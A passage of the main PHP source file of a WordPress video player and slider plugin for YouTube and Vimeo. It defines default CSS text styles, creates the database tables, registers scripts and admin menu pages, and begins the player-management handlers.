<?php
/*
Plugin Name: YouTube & Vimeo Video Player and Slider With Playlist WordPress Plugin
Description: This plugin will allow you to create an YouTube & Vimeo video player or an image slider
Version: 3.8
Author: Lambert Group
Author URI: https://1.envato.market/G37VE
Text Domain: ytbvimeo-video
*/

$video_player_youtube_vimeo_path = trailingslashit(dirname(__FILE__));  //empty

//all the messages
$video_player_youtube_vimeo_messages = array(
		'version' => esc_html__( '<div class="error">YouTube & Vimeo Video Player With Playlist WordPress Plugin requires WordPress 3.0 or newer. <a href="http://codex.wordpress.org/Upgrading_WordPress">Please update!</a></div>', 'ytbvimeo-video' ),
		'empty_img' => esc_html__( 'Image - required', 'ytbvimeo-video' ),
		'empty_name' => esc_html__( 'Name - required', 'ytbvimeo-video' ),
		'invalid_request' => esc_html__( 'Invalid Request!', 'ytbvimeo-video' ),
		'generate_for_this_player' => esc_html__( 'You can start customizing this player.', 'ytbvimeo-video' ),
		'data_saved' => esc_html__( 'Data Saved!', 'ytbvimeo-video' )
	);


global $general_param; // for activation_hook only
$general_param = array(
	'css_styles_const' => '/*textWhiteBgBlack*/
.video_player_youtube_vimeo_textWhiteBgBlack_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#FFF;
	background:#000;
	padding:5px 6px;
	margin:0;
}
.video_player_youtube_vimeo_textWhiteBgBlack_small a {
	color:#FFF;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgBlack_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgBlack_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#FFF;
	background:#000;
	padding:6px 7px;
	margin:0;
}
.video_player_youtube_vimeo_textWhiteBgBlack_medium a {
	color:#FFF;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgBlack_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgBlack_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#FFF;
	background:#000;
	padding:7px 10px;
	margin:0;
}
.video_player_youtube_vimeo_textWhiteBgBlack_large a {
	color:#FFF;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgBlack_large a:hover {
	color:#F00;
	text-decoration:underline;
}
/*textBlackBgWhite*/
.video_player_youtube_vimeo_textBlackBgWhite_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#000;
	background:#FFF;
	padding:5px 6px;
	margin:0;
}
.video_player_youtube_vimeo_textBlackBgWhite_small a {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgWhite_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgWhite_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#000;
	background:#FFF;
	padding:6px 7px;
	margin:0;
}
.video_player_youtube_vimeo_textBlackBgWhite_medium a {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgWhite_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgWhite_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#000;
	background:#FFF;
	padding:7px 10px;
	margin:0;
}
.video_player_youtube_vimeo_textBlackBgWhite_large a {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgWhite_large a:hover {
	color:#F00;
	text-decoration:underline;
}
/*textRedBgWhite*/
.video_player_youtube_vimeo_textRedBgWhite_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#F00;
	background:#FFF;
	padding:5px 6px;
	margin:0;
}
.video_player_youtube_vimeo_textRedBgWhite_small a {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgWhite_small a:hover {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgWhite_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#F00;
	background:#FFF;
	padding:6px 7px;
	margin:0;
}
.video_player_youtube_vimeo_textRedBgWhite_medium a {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgWhite_medium a:hover {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgWhite_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#F00;
	background:#FFF;
	padding:7px 10px;
	margin:0;
}
.video_player_youtube_vimeo_textRedBgWhite_large a {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgWhite_large a:hover {
	color:#000;
	text-decoration:underline;
}
/*textBlueBgWhite*/
.video_player_youtube_vimeo_textBlueBgWhite_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#00F;
	background:#FFF;
	padding:5px 6px;
	margin:0;
}
.video_player_youtube_vimeo_textBlueBgWhite_small a {
	color:#00F;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlueBgWhite_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlueBgWhite_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#00F;
	background:#FFF;
	padding:6px 7px;
	margin:0;
}
.video_player_youtube_vimeo_textBlueBgWhite_medium a {
	color:#00F;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlueBgWhite_medium a:hover {
	color:#F00;
	text-decoration:underline;
}

.video_player_youtube_vimeo_textBlueBgWhite_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#00F;
	background:#FFF;
	padding:7px 10px;
	margin:0;
}
.video_player_youtube_vimeo_textBlueBgWhite_large a {
	color:#00F;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlueBgWhite_large a:hover {
	color:#F00;
	text-decoration:underline;
}
/*textWhiteBgTransparent*/
.video_player_youtube_vimeo_textWhiteBgTransparent_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#FFF;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textWhiteBgTransparent_small a {
	color:#FFF;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgTransparent_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgTransparent_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#FFF;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textWhiteBgTransparent_medium a {
	color:#FFF;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgTransparent_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgTransparent_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#FFF;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textWhiteBgTransparent_large a {
	color:#FFF;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textWhiteBgTransparent_large a:hover {
	color:#F00;
	text-decoration:underline;
}
/*textBlackBgTransparent*/
.video_player_youtube_vimeo_textBlackBgTransparent_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#000;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textBlackBgTransparent_small a {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgTransparent_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgTransparent_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#000;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textBlackBgTransparent_medium a {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgTransparent_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgTransparent_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#000;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textBlackBgTransparent_large a {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlackBgTransparent_large a:hover {
	color:#F00;
	text-decoration:underline;
}
/*textRedBgTransparent*/
.video_player_youtube_vimeo_textRedBgTransparent_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#F00;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textRedBgTransparent_small a {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgTransparent_small a:hover {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgTransparent_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#F00;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textRedBgTransparent_medium a {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgTransparent_medium a:hover {
	color:#000;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgTransparent_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#F00;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textRedBgTransparent_large a {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textRedBgTransparent_large a:hover {
	color:#000;
	text-decoration:underline;
}
/*textBlueBgTransparent*/
.video_player_youtube_vimeo_textBlueBgTransparent_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#00F;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textBlueBgTransparent_small a {
	color:#00F;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlueBgTransparent_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlueBgTransparent_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#00F;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textBlueBgTransparent_medium a {
	color:#00F;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlueBgTransparent_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlueBgTransparent_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#00F;
	background:none;
	padding:0;
	margin:0;
}
.video_player_youtube_vimeo_textBlueBgTransparent_large a {
	color:#00F;
	text-decoration:underline;
}
.video_player_youtube_vimeo_textBlueBgTransparent_large a:hover {
	color:#F00;
	text-decoration:underline;
}'
);


global $wp_version;

if ( !version_compare($wp_version,"3.0",">=")) {
	die ($video_player_youtube_vimeo_messages['version']);
}




function video_player_youtube_vimeo_activate() {
	//db creation, create admin options etc.
	global $wpdb;
	global $general_param;

	$video_player_youtube_vimeo_collate = ' COLLATE utf8_general_ci';

	$sql0 = "CREATE TABLE `" . $wpdb->prefix . "video_player_youtube_vimeo_players` (
			`id` INT UNSIGNED NOT NULL AUTO_INCREMENT ,
			`name` VARCHAR( 255 ) NOT NULL ,
			PRIMARY KEY ( `id` )
			) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	$sql1 = "CREATE TABLE `" . $wpdb->prefix . "video_player_youtube_vimeo_settings` (
  `id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
  `width` smallint(5) unsigned NOT NULL DEFAULT '960',
  `height` smallint(5) unsigned NOT NULL DEFAULT '384',
  `width100Proc` varchar(8) NOT NULL DEFAULT 'false',
  `height100Proc` varchar(8) NOT NULL DEFAULT 'false',
	`centerPlugin` varchar(8) NOT NULL DEFAULT 'false',
  `skin` varchar(255) NOT NULL DEFAULT 'default',
  `randomizeImages` varchar(8) NOT NULL DEFAULT 'false',
  `firstImg` smallint(5) unsigned NOT NULL DEFAULT '0',
  `initialVolume` float unsigned NOT NULL DEFAULT '1',
  `numberOfStripes` smallint(5) unsigned NOT NULL DEFAULT '20',
  `numberOfRows` smallint(5) unsigned NOT NULL DEFAULT '5',
  `numberOfColumns` smallint(5) unsigned NOT NULL DEFAULT '10',
  `defaultEffect` varchar(255) NOT NULL DEFAULT 'random',
  `effectDuration` float unsigned NOT NULL DEFAULT '0.5',
  `autoPlay` smallint(5) unsigned NOT NULL DEFAULT '4',
  `autoPlayFirstVideo` varchar(8) NOT NULL DEFAULT 'true',
  `autoPlayNextVideo` varchar(8) NOT NULL DEFAULT 'true',
  `loop` varchar(8) NOT NULL DEFAULT 'true',
  `target` varchar(255) NOT NULL DEFAULT '_blank',
  `enableTouchScreen` varchar(8) NOT NULL DEFAULT 'false',
  `borderWidth` smallint(5) unsigned NOT NULL DEFAULT '14',
  `borderColor` varchar(8) NOT NULL DEFAULT '4a4a4a',
  `showCircleTimer` varchar(8) NOT NULL DEFAULT 'true',
  `showCircleTimerIE8IE7` varchar(8) NOT NULL DEFAULT 'false',
  `circleRadius` smallint(5) unsigned NOT NULL DEFAULT '10',
  `circleLineWidth` smallint(5) unsigned NOT NULL DEFAULT '4',
  `circleColor` varchar(8) NOT NULL DEFAULT 'FF0000',
  `circleAlpha` smallint(5) unsigned NOT NULL DEFAULT '50',
  `behindCircleColor` varchar(8) NOT NULL DEFAULT '000000',
  `behindCircleAlpha` smallint(5) unsigned NOT NULL DEFAULT '20',
  `responsive` varchar(8) NOT NULL DEFAULT 'true',
  `responsiveRelativeToBrowser` varchar(8) NOT NULL DEFAULT 'false',
  `showAllControllers` varchar(8) NOT NULL DEFAULT 'true',
  `showNavArrows` varchar(8) NOT NULL DEFAULT 'false',
  `showOnInitNavArrows` varchar(8) NOT NULL DEFAULT 'true',
  `autoHideNavArrows` varchar(8) NOT NULL DEFAULT 'true',
  `showThumbs` varchar(8) NOT NULL DEFAULT 'true',
  `playlistWidth` smallint(5) unsigned NOT NULL DEFAULT '300',
  `numberOfThumbsPerScreen` smallint(5) unsigned NOT NULL DEFAULT '0',
  `playlistRecordShowImg` varchar(8) NOT NULL DEFAULT 'true',
  `playlistRecordShowTitle` varchar(8) NOT NULL DEFAULT 'true',
  `playlistRecordShowDesc` varchar(8) NOT NULL DEFAULT 'true',
  `playlistRecordHeight` smallint(5) unsigned NOT NULL DEFAULT '110',
  `playlistRecordPadding` smallint(5) unsigned NOT NULL DEFAULT '10',
  `playlistTitleFontSize` smallint(5) unsigned NOT NULL DEFAULT '15',
  `playlistTitleLineHeight` smallint(5) unsigned NOT NULL DEFAULT '19',
  `playlistDescFontSize` smallint(5) unsigned NOT NULL DEFAULT '12',
  `playlistDescLineHeight` smallint(5) unsigned NOT NULL DEFAULT '15',
  `playlistRecordBgOffColor` varchar(8) NOT NULL DEFAULT '000000',
  `playlistRecordTitleOffColor` varchar(8) NOT NULL DEFAULT 'CCCCCC',
  `playlistRecordDescOffColor` varchar(8) NOT NULL DEFAULT 'CCCCCC',
  `playlistRecordBgOffImgOpacity` smallint(5) unsigned NOT NULL DEFAULT '100',
  `playlistRecordBgOnColor` varchar(8) NOT NULL DEFAULT 'cc181e',
  `playlistRecordTitleOnColor` varchar(8) NOT NULL DEFAULT 'FFFFFF',
  `playlistRecordDescOnColor` varchar(8) NOT NULL DEFAULT 'FFFFFF',
  `playlistRecordBgOnImgOpacity` smallint(5) unsigned NOT NULL DEFAULT '100',
  `playlistBgColor` varchar(8) NOT NULL DEFAULT '4a4a4a',
  `playlistRecordTitleLimit` smallint(5) unsigned NOT NULL DEFAULT '26',
  `playlistRecordDescLimit` smallint(5) unsigned NOT NULL DEFAULT '100',
  `getYouTubeData` varchar(8) NOT NULL DEFAULT 'false',
  `origThumbImgW` smallint(5) unsigned NOT NULL DEFAULT '90',
  `origThumbImgH` smallint(5) unsigned NOT NULL DEFAULT '90',
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	$sql2 = "CREATE TABLE `". $wpdb->prefix . "video_player_youtube_vimeo_playlist` (
	  `id` int(10) unsigned NOT NULL auto_increment,
	  `playerid` int(10) unsigned NOT NULL,
	  `img` text,
	  `data-bottom-thumb` text,
	  `data-title` varchar(255),
	  `data-desc` text,
	  `data-youtube` varchar(255),
	  `data-vimeo` varchar(255),
	  `data-transition` varchar(255),
	  `data-link` text,
	  `data-target` varchar(8),
	  `ord` int(10) unsigned NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";



	$sql3 = "CREATE TABLE `". $wpdb->prefix . "video_player_youtube_vimeo_texts` (
	  `id` int(10) unsigned NOT NULL auto_increment,
	  `photoid` int(10) unsigned NOT NULL,
	  `content` text,
	  `data-initial-left` smallint(5),
	  `data-initial-top` smallint(5),
	  `data-initial-skew` varchar(30),
	  `data-initial-scale` varchar(30),
	  `data-final-left` smallint(5),
	  `data-final-top` smallint(5),
	  `data-final-skew` varchar(30),
	  `data-final-scale` varchar(30),
	  `data-duration` float unsigned,
	  `data-fade-start` smallint(5) unsigned,
	  `data-delay` float unsigned,
	  `css` text,
	  `img_src` text,
	  `element-link` text,
	  `element-link-target` varchar(20),
	  `data-easing` varchar(20),
	  `data-exit-left` smallint(5),
	  `data-exit-top` smallint(5),
	  `data-exit-fade` float,
	  `data-exit-duration` float unsigned,
	  `data-exit-delay` float unsigned,
	  `data-exit-easing` varchar(20),
	  `data-exit-off` varchar(8),
	  `data-exit-skew` varchar(30),
	  `data-exit-scale` varchar(30),
	  `data-intermediate-left` smallint(5),
	  `data-intermediate-top` smallint(5),
	  `data-intermediate-duration` float unsigned,
	  `data-intermediate-easing` varchar(20),
	  `data-intermediate-delay` float unsigned,
	  `data-intermediate-skew` varchar(30),
	  `data-intermediate-scale` varchar(30),
	  `ord` int(10) unsigned NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";



	$sql4 = "CREATE TABLE `". $wpdb->prefix . "video_player_youtube_vimeo_css_definitions` (
	  `id` int(2) unsigned NOT NULL auto_increment,
	  `css_styles` text,
	  `css_styles_orig` text,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";


	require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
	dbDelta($sql0.$video_player_youtube_vimeo_collate);
	dbDelta($sql1.$video_player_youtube_vimeo_collate);
	dbDelta($sql2.$video_player_youtube_vimeo_collate);
	dbDelta($sql3.$video_player_youtube_vimeo_collate);
	dbDelta($sql4.$video_player_youtube_vimeo_collate);


	//initialize the players table with the first banner type
	$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix ."video_player_youtube_vimeo_players;" );
	if (!$rows_count) {
		$wpdb->insert(
			$wpdb->prefix . "video_player_youtube_vimeo_players",
			array(
				'name' => 'First Player'
			),
			array(
				'%s'
			)
		);
	}

	// initialize the settings
	$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix ."video_player_youtube_vimeo_settings;" );
	if (!$rows_count) {
		video_player_youtube_vimeo_insert_settings_record(1);
	}


	//initialize the css styles
	$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix ."video_player_youtube_vimeo_css_definitions;" );
	if (!$rows_count) {
		$wpdb->insert(
			$wpdb->prefix . "video_player_youtube_vimeo_css_definitions",
			array(
				'css_styles' => stripslashes($general_param['css_styles_const']),
				'css_styles_orig' => stripslashes($general_param['css_styles_const'])
			),
			array(
				'%s',
				'%s'
			)
		);
	}

}



function video_player_youtube_vimeo_insert_settings_record($banner_id) {
	global $wpdb;
	$wpdb->insert(
			$wpdb->prefix . "video_player_youtube_vimeo_settings",
			array(
				'width' => 960,
				'height' => 384
			),
			array(
				'%d',
				'%d'
			)
		);
}


function video_player_youtube_vimeo_init_sessions() {
	global $wpdb;
	if (is_admin()) {
		if (!session_id()) {
			session_start();

			//initialize the session
			if (!isset($_SESSION['xid'])) {
				$safe_sql="SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_players) LIMIT 0, 1";
				$row = $wpdb->get_row($safe_sql,ARRAY_A);
				$_SESSION['xid'] = $row['id'];
				$_SESSION['xname'] = $row['name'];

				$_SESSION['duplicate_layer']=0;
			}
		}
	}
}

function video_player_youtube_vimeo_end_sessions() {
		if (is_admin()) {
			session_destroy ();
		}
}


function video_player_youtube_vimeo_load_styles() {
	global $wpdb;
	if(strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false) {
		$page = (isset($_GET['page'])) ? $_GET['page'] : '';
		if(preg_match('/YOUTUBE_VIMEO_VIDEO_PLAYER/i', $page)) {
			wp_enqueue_style('lbg-jquery-ui-custom_css', 'http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/themes/pepper-grinder/jquery-ui.min.css');
			wp_enqueue_style('video_player_youtube_vimeo_css', plugins_url('css/styles.css', __FILE__));
			wp_enqueue_style('video_player_youtube_vimeo_colorpicker_css', plugins_url('css/colorpicker/colorpicker.css', __FILE__));


			wp_enqueue_style('thickbox');

			wp_enqueue_style('video_player_youtube_vimeo_site_css', plugins_url('video_player_youtube_vimeo/youtubeVimeoWithPlaylist.css', __FILE__));

		}
	} else if (!is_admin()) { //loads css in front-end
		wp_enqueue_style('video_player_youtube_vimeo_site_css', plugins_url('video_player_youtube_vimeo/youtubeVimeoWithPlaylist.css', __FILE__));
		wp_enqueue_style('lbg_zoominoutslider_text_classes', plugins_url('video_player_youtube_vimeo/text_classes.css', __FILE__));
	}
}

function video_player_youtube_vimeo_load_scripts() {
	global $is_IE;
	$page = (isset($_GET['page'])) ? $_GET['page'] : '';
	if(preg_match('/YOUTUBE_VIMEO_VIDEO_PLAYER/i', $page)) {
		//loads scripts in admin
			wp_enqueue_script('jquery');

			wp_enqueue_script('jquery-ui-core');
			wp_enqueue_script('jquery-ui-widget');
			wp_enqueue_script('jquery-ui-mouse');
			wp_enqueue_script('jquery-ui-accordion');
			wp_enqueue_script('jquery-ui-autocomplete');
			wp_enqueue_script('jquery-ui-slider');
			wp_enqueue_script('jquery-ui-tabs');
			wp_enqueue_script('jquery-ui-sortable');
			wp_enqueue_script('jquery-ui-draggable');
			wp_enqueue_script('jquery-ui-droppable');
			wp_enqueue_script('jquery-ui-selectable');
			wp_enqueue_script('jquery-ui-position');
			wp_enqueue_script('jquery-ui-datepicker');
			wp_enqueue_script('jquery-ui-resizable');
			wp_enqueue_script('jquery-ui-dialog');
			wp_enqueue_script('jquery-ui-button');

			wp_enqueue_script('jquery-form');
			wp_enqueue_script('jquery-color');
			wp_enqueue_script('jquery-masonry');
			wp_enqueue_script('jquery-ui-progressbar');
			wp_enqueue_script('jquery-ui-tooltip');

			wp_enqueue_script('jquery-effects-core');
			wp_enqueue_script('jquery-effects-blind');
			wp_enqueue_script('jquery-effects-bounce');
			wp_enqueue_script('jquery-effects-clip');
			wp_enqueue_script('jquery-effects-drop');
			wp_enqueue_script('jquery-effects-explode');
			wp_enqueue_script('jquery-effects-fade');
			wp_enqueue_script('jquery-effects-fold');
			wp_enqueue_script('jquery-effects-highlight');
			wp_enqueue_script('jquery-effects-pulsate');
			wp_enqueue_script('jquery-effects-scale');
			wp_enqueue_script('jquery-effects-shake');
			wp_enqueue_script('jquery-effects-slide');
			wp_enqueue_script('jquery-effects-transfer');

			wp_register_script('lbg-admin-jquery-ui-core', includes_url().'js/jquery/ui/core.min.js');
			wp_enqueue_script('lbg-admin-jquery-ui-core');

			wp_register_script('lbg-admin-jquery-ui-widget', includes_url().'js/jquery/ui/widget.min.js');
			wp_enqueue_script('lbg-admin-jquery-ui-widget');

			wp_register_script('lbg-admin-jquery-ui-mouse', includes_url().'js/jquery/ui/mouse.min.js');
			wp_enqueue_script('lbg-admin-jquery-ui-mouse');

			wp_register_script('lbg-admin-jquery-ui-draggable', includes_url().'js/jquery/ui/draggable.min.js');
			wp_enqueue_script('lbg-admin-jquery-ui-draggable');

			wp_register_script('my-colorpicker', plugins_url('js/colorpicker/colorpicker.js', __FILE__));
			wp_enqueue_script('my-colorpicker');

			wp_register_script('lbg-admin-toggle', plugins_url('js/myToggle.js', __FILE__));
			wp_enqueue_script('lbg-admin-toggle');


			wp_enqueue_script('media-upload'); // before w.p 3.5
			wp_enqueue_media();// from w.p 3.5
			wp_enqueue_script('thickbox');

	} else if (!is_admin()) { //loads scripts in front-end

		wp_enqueue_script('jquery');

			wp_enqueue_script('jquery-ui-core');
			wp_enqueue_script('jquery-ui-slider');
			wp_enqueue_script('jquery-effects-transfer');

		wp_register_script('lbg-vimeo-2', 'https://player.vimeo.com/api/player.js');
		wp_enqueue_script('lbg-vimeo-2');

		wp_register_script('lbg-mousewheel', plugins_url('video_player_youtube_vimeo/js/jquery.mousewheel.min.js', __FILE__));
		wp_enqueue_script('lbg-mousewheel');

		wp_register_script('lbg-touchSwipe', plugins_url('video_player_youtube_vimeo/js/jquery.touchSwipe.min.js', __FILE__));
		wp_enqueue_script('lbg-touchSwipe');

		wp_register_script('lbg-video_player_youtube_vimeo', plugins_url('video_player_youtube_vimeo/js/youtubeVimeoWithPlaylist.js', __FILE__));
		wp_enqueue_script('lbg-video_player_youtube_vimeo');

	}




}



// adds the menu pages
function video_player_youtube_vimeo_plugin_menu() {
	add_menu_page('YOUTUBE_VIMEO_VIDEO_PLAYER Admin Interface', 'YOUTUBE VIMEO VIDEO PLAYER & SLIDER', 'edit_posts', 'YOUTUBE_VIMEO_VIDEO_PLAYER', 'video_player_youtube_vimeo_overview_page',
	plugins_url('images/plg_icon.png', __FILE__));
	add_submenu_page( 'YOUTUBE_VIMEO_VIDEO_PLAYER', 'YOUTUBE_VIMEO_VIDEO_PLAYER Overview', 'Overview', 'edit_posts', 'YOUTUBE_VIMEO_VIDEO_PLAYER', 'video_player_youtube_vimeo_overview_page');
	add_submenu_page( 'YOUTUBE_VIMEO_VIDEO_PLAYER', 'YOUTUBE_VIMEO_VIDEO_PLAYER Manage Players', 'Manage Players', 'edit_posts', 'YOUTUBE_VIMEO_VIDEO_PLAYER_Manage_Players', 'video_player_youtube_vimeo_manage_players_page');
	add_submenu_page( 'YOUTUBE_VIMEO_VIDEO_PLAYER', 'YOUTUBE_VIMEO_VIDEO_PLAYER Manage Players Add New', 'Add New', 'edit_posts', 'YOUTUBE_VIMEO_VIDEO_PLAYER_Add_New', 'video_player_youtube_vimeo_manage_players_add_new_page');
	add_submenu_page( 'YOUTUBE_VIMEO_VIDEO_PLAYER_Manage_Players', 'YOUTUBE_VIMEO_VIDEO_PLAYER Player Settings', 'Player Settings', 'edit_posts', 'YOUTUBE_VIMEO_VIDEO_PLAYER_Settings', 'video_player_youtube_vimeo_settings_page');
	add_submenu_page( 'YOUTUBE_VIMEO_VIDEO_PLAYER_Manage_Players', 'YOUTUBE_VIMEO_VIDEO_PLAYER Player Playlist', 'Playlist', 'edit_posts', 'YOUTUBE_VIMEO_VIDEO_PLAYER_Playlist', 'video_player_youtube_vimeo_playlist_page');
	add_submenu_page( 'YOUTUBE_VIMEO_VIDEO_PLAYER_Manage_Players', 'YOUTUBE_VIMEO_VIDEO_PLAYER Edit Elements', 'Edit Elements', 'edit_posts', 'YOUTUBE_VIMEO_VIDEO_PLAYER_Edit_Elements', 'video_player_youtube_vimeo_editElements_page');
	add_submenu_page( 'YOUTUBE_VIMEO_VIDEO_PLAYER', 'YOUTUBE_VIMEO_VIDEO_PLAYER Help', 'Help', 'edit_posts', 'YOUTUBE_VIMEO_VIDEO_PLAYER_Help', 'video_player_youtube_vimeo_help_page');
}


//HTML content for overview page
function video_player_youtube_vimeo_overview_page()
{
	global $video_player_youtube_vimeo_path;
	include_once($video_player_youtube_vimeo_path . 'tpl/overview.php');
}

//HTML content for Manage players
function video_player_youtube_vimeo_manage_players_page()
{
	global $wpdb;
	global $video_player_youtube_vimeo_messages;
	global $video_player_youtube_vimeo_path;

	//delete banner
	if (isset($_GET['id'])) {




		//delete from wp_video_player_youtube_vimeo_players
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."video_player_youtube_vimeo_players WHERE id = %d",$_GET['id']));

		//delete from wp_video_player_youtube_vimeo_settings
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."video_player_youtube_vimeo_settings WHERE id = %d",$_GET['id']));

		//delete video_player_youtube_vimeo_texts
		$safe_sql=$wpdb->prepare("SELECT id FROM ".$wpdb->prefix."video_player_youtube_vimeo_playlist WHERE playerid = %d",$_GET['id']);
		$result = $wpdb->get_results($safe_sql,ARRAY_A);
		if ($wpdb->num_rows) {
			foreach ( $result as $row ) {
				$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."video_player_youtube_vimeo_texts WHERE photoid = %d",$row['id']));
			}
		}

		//delete from wp_video_player_youtube_vimeo_playlist
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."video_player_youtube_vimeo_playlist WHERE playerid = %d",$_GET['id']));

		//initialize the session
		$safe_sql="SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_players) ORDER BY id";
		$row = $wpdb->get_row($safe_sql,ARRAY_A);
		$row=video_player_youtube_vimeo_unstrip_array($row);
		if ($row['id']) {
			$_SESSION['xid']=$row['id'];
			$_SESSION['xname']=$row['name'];
		}
	}

	if (array_key_exists('duplicate_id', $_GET) && $_GET['duplicate_id']!='') {
			//players
